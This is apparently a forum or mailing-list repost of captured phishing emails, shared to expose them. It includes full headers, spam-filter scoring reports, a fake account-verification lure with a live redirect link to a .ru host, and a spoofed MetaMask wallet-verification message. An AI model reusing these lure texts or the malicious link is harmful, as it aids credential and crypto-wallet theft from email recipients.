Verify Your Account [href=https://r.srvtrck.com/v1/redirect?yk_tag=337_47d_c3_3b6f&site_id=56e7d51be4b05d750682348a&api_key=abbc5236946676eae219a734c0a1c5e8&url=http://srv244547.hoster-test.ru/Indx/server/IndexIPFSOTFF.html#dave@doctor.nl2k.ab.ca]

If you do not verify your account within 24 hours, access to your account may be restricted for your protection.

Thank you,

doctor.nl2k.ab.ca Security Team

Security | Privacy | Help [each href=https://www.html.am/html-editors/online-html-editor.cfm#]

© 2025 doctor.nl2k.ab.ca Corporation. All rights reserved.



Credential Phish Part 1

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Mon, 08 Dec 2025 09:24:00 -0700

Received: from agriel.us ([50.76.93.152]:49252)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe0t-00000000LLU-1jkW

for dave@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 09:23:20 -0700

Received: from gmail.com (unknown [10.240.90.20])

by agriel.us (Postfix) with ESMTPS id 79D86A426E

for ; Mon, 8 Dec 2025 16:20:46 +0000 (UTC)

From: doctor.nl2k.ab.ca

To: dave@doctor.nl2k.ab.ca

Subject: Action Required: Verify Your doctor.nl2k.ab.ca Account to Avoid Access Restrictions

Date: 08 Dec 2025 08:20:46 -0800

Message-ID: <20251208082045.CA9D9C3DD163D60F@gmail.com>

MIME-Version: 1.0

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 19.9

X-Spam_score_int: 199

X-Spam_bar: +++++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: doctor.nl2k.ab.ca Account Services Account Verification Required

We are conducting a routine security check on all accounts to ensure your

account information is accurate and secure. This process is mandatory to

maintain uninterrupted access to your account.



Content analysis details: (19.9 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

0.0 DKIM_ADSP_CUSTOM_MED No valid author signature, adsp_override is

CUSTOM_MED

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.5 NO_RDNS Sending MTA has no reverse DNS (Postfix variant)

1.4 FSL_HELO_FAKE No description available.

0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider

[support2(at)gmail.com]

0.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in

digit

[support2(at)gmail.com]

1.0 FORGED_GMAIL_RCVD 'From' gmail.com does not match 'Received' headers

0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence

0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment

0.0 HTML_FONT_SIZE_HUGE BODY: HTML font size is huge

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

3.0 VOWEL_URI_7 RAW: URI hostname with 7+ consecutive vowels

1.5 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as "accounts

suspended", "account credited", "account

verification"

1.2 NML_ADSP_CUSTOM_MED ADSP custom_med hit, and not from a mailing list

0.0 SPOOFED_FREEMAIL No description available.

1.0 ACCT_PHISHING Possible phishing for account information

1.5 SPOOF_GMAIL_MID From Gmail but it doesn't seem to be...

0.9 URI_PHISH Phishing using web form

Subject: {SPAM?} Action Required: Verify Your doctor.nl2k.ab.ca Account to Avoid Access Restrictions







Credential phishing Part 2

Content preview: doctor.nl2k.ab.ca Account Services Account Verification Required

We are conducting a routine security check on all accounts to ensure your

account information is accurate and secure. This process is mandatory to

maintain uninterrupted access to your account.



Content analysis details: (19.9 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

0.0 DKIM_ADSP_CUSTOM_MED No valid author signature, adsp_override is

CUSTOM_MED

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.5 NO_RDNS Sending MTA has no reverse DNS (Postfix variant)

1.4 FSL_HELO_FAKE No description available.

0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider

[support2(at)gmail.com]

0.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in

digit

[support2(at)gmail.com]

1.0 FORGED_GMAIL_RCVD 'From' gmail.com does not match 'Received' headers

0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence

0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment

0.0 HTML_FONT_SIZE_HUGE BODY: HTML font size is huge

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

3.0 VOWEL_URI_7 RAW: URI hostname with 7+ consecutive vowels

1.5 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as "accounts

suspended", "account credited", "account

verification"

0.0 SPOOFED_FREEMAIL No description available.

1.0 ACCT_PHISHING Possible phishing for account information

1.5 SPOOF_GMAIL_MID From Gmail but it doesn't seem to be...

1.2 NML_ADSP_CUSTOM_MED ADSP custom_med hit, and not from a mailing list

0.9 URI_PHISH Phishing using web form

Subject: {SPAM?} Action Required: Verify Your doctor.nl2k.ab.ca Account to Avoid Access Restrictions




doctor.nl2k.ab.ca Account Services

Account Verification Required

We are conducting a routine security check on all accounts to ensure your account information is accurate and secure. This process is mandatory to maintain uninterrupted access to your account.

Recommended action:

Please verify your account within the next 24 hours to avoid any temporary access restrictions.

Verify Your Account [href=https://r.srvtrck.com/v1/redirect?yk_tag=337_47d_c3_3b6f&site_id=56e7d51be4b05d750682348a&api_key=abbc5236946676eae219a734c0a1c5e8&url=http://srv244547.hoster-test.ru/Indx/server/IndexIPFSOTFF.html#doctor@doctor.nl2k.ab.ca]

If you do not verify your account within 24 hours, access to your account may be restricted for your protection.

Thank you,

doctor.nl2k.ab.ca Security Team

Security | Privacy | Help [each href=https://www.html.am/html-editors/online-html-editor.cfm#]

© 2025 doctor.nl2k.ab.ca Corporation. All rights reserved.



Credential phishing part 1

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Mon, 08 Dec 2025 08:09:00 -0700

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vScqm-000000003YR-2YGb

for dave@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 08:08:32 -0700

Resent-From: The Doctor

Resent-Date: Mon, 8 Dec 2025 08:08:32 -0700

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from mx.cndns.org ([107.189.14.8]:53090)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSciU-000000002u7-3sbu

for sales@nk.ca;

Mon, 08 Dec 2025 08:00:07 -0700

Received: from [194.110.173.9] (unknown [194.110.173.9])

by mx.cndns.org (Postfix) with ESMTP id 78FB183A5E

for ; Mon, 8 Dec 2025 14:47:47 +0000 (UTC)

From: walletstatus@metamask.io

To: sales@nk.ca

Subject: Action Required: Confirm Your Wallet Activity sales@nk.ca

Date: 8 Dec 2025 06:47:47 -0800

Message-ID: <20251208064747.936BC1FECDA34FB8@metamask.io>

MIME-Version: 1.0

Content-Type: text/html;

charset="utf-8"

Content-Transfer-Encoding: quoted-printable













MetaMask Account Maintenance






🦊

MetaMask Systems

Wallet Status Verification

Dear Valued User,

As part of our routine account maintenance procedures, MetaMask is currently verifying the status of wallets linked to your profile. Our systems have detected one of your registered wallets has shown no recent activity.

To ensure continued secure association with your account, please confirm you are still actively using this wallet.

🔐 Verify Wallet Activity

ℹ️ Information: If this wallet is no longer in use, no action is required. Inactive wallets may be automatically archived during our next system update.

Thank you for your cooperation.

MetaMask Operations Team

This is an automated maintenance notification for your MetaMask account.

Contact Support | Privacy Policy | Manage Preferences












Metamask phish part 1

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Mon, 08 Dec 2025 08:09:00 -0700

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vScqm-000000003YR-2YGb

for dave@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 08:08:32 -0700

Resent-From: The Doctor

Resent-Date: Mon, 8 Dec 2025 08:08:32 -0700

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from mx.cndns.org ([107.189.14.8]:53090)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSciU-000000002u7-3sbu

for sales@nk.ca;

Mon, 08 Dec 2025 08:00:07 -0700

Received: from [194.110.173.9] (unknown [194.110.173.9])

by mx.cndns.org (Postfix) with ESMTP id 78FB183A5E

for ; Mon, 8 Dec 2025 14:47:47 +0000 (UTC)

From: walletstatus@metamask.io

To: sales@nk.ca

Subject: Action Required: Confirm Your Wallet Activity sales@nk.ca

Date: 8 Dec 2025 06:47:47 -0800

Message-ID: <20251208064747.936BC1FECDA34FB8@metamask.io>

MIME-Version: 1.0

Content-Type: text/html;

charset="utf-8"

Content-Transfer-Encoding: quoted-printable













MetaMask Account Maintenance